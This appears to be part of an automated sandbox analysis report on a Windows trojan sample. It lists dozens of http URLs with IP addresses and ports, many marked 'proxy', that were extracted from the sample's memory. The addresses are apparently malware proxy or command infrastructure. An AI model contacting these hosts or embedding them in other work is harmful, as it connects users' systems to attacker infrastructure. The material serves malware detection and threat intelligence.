                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C760E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:10867
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:10867://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:22775
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:22775://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:30999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:30999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E65000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10011
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10011://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA92B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10863
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10863://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:13897
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:13897://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:14681
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:14681://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91FC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C938E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:16251
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:16251://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:17685
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:17685://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:18309
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:18309://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:18475
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:18475://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:19567
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:19567://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:20469
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:20469://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:31071
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:31071://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:32065
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:32065://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:32425
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:32425://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:3621
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:3621://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:3739
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:3739://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4479://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4479xD
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:9023
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:9023://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:17719
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:17719://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91D2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:24805
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:24805://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:25813
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:25813://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E31000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C696E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:30883
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C659E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:30883://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:32425
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:32425://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:6933
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:6933://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:6933HJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.229:16553
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.229:16553://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.229:29003
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.229:29003://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:23685
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:23685://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18003
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18003://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:19895
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:19895://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C853A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:11339
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C853A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:11339://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:20863
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:20863://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:24105
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:24105://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:27487
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:27487://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6EE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:1499
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:1499://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:8325
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:8325://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:11983
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:11983://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:12361
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:12361://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB2C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14869
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14869://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:20371
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:20371://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:28143
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:28143://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3889
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3889://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3993
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3993://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C691F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:4789
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C674C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:4789://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:7491
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:7491://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CABBE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:14955
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:14955://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:32221
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:32221://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:22645
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:22645://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.19:10587
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.19:10587://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.19:32175
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.19:32175://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10121
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10121://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF3A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10671
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10671://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC5F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10851
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10851://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11049
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11049://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1CE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11199
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11199://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:1143
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:1143://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11489
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11489://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:14133
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:14133://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:14699
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:14699://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:1585
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:1585://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:16349
